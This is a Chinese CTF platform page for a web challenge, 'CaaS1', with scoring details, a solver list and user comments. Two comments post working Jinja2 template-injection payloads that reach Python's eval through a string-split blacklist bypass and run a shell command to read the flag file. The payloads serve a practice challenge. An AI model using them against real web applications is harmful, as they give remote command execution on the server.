CaaS1 - Bugku CTF平台

CaaS1WEB 未解决

分数: 40 金币: 4

题目作者: Aman

一　　血: Paradiso

一血奖励: 4金币

解　　决: 127

提　　示:

描　　述:

CaaS1

其　　他: server.zip

评论

124要留就要77 7月前

举报

name={{g.pop["__global""s__"].__builtins__.eval(request.form.team_name)}}&team_name=__import__("os").popen("cat flag.txt").read() 直接获取flag

回复 1

baozongwi 1年前

举报

会不会出题大哥，这黑名单里面有[]为什么这样子还能过 name={{g.pop["__global""s__"].__builtins__.eval(request.args.x)}}&team_name=g 怎么回事

回复 0

网络小钦 1年前

举报

看不懂啊

回复 0

2552758573 1年前

举报

payload太长了，绕不过去

回复 0

无法释怀的遗憾en 2年前

举报

这个题什么意思

回复 0

无法释怀的遗憾en 1年前

举报

@cgxx 懂了好玩这个题

回复 0

cgxx 2年前

举报

模板注入

回复 0

WriteUp

vchopin

2 金币

立即查看

评分(1)

解题动态

SkyAsh 攻破了该题 4天前

nihaolmb 攻破了该题 14天前

pigpigG6768 攻破了该题 16天前

20230302203 攻破了该题 19天前

刘德龙攻破了该题 20天前

叶子璐攻破了该题 20天前

农群丹攻破了该题 20天前

杨荣涛攻破了该题 20天前

05su 攻破了该题 21天前

xz6666 攻破了该题 21天前

螺蛳粉攻破了该题 21天前

金典攻破了该题 21天前

特仑苏攻破了该题 21天前

韦东妙攻破了该题 21天前

陆美宏攻破了该题 21天前

严晓颖攻破了该题 21天前

卢思杏攻破了该题 21天前

杨节攻破了该题 21天前

覃晴韵攻破了该题 21天前

0622 攻破了该题 21天前

问题反馈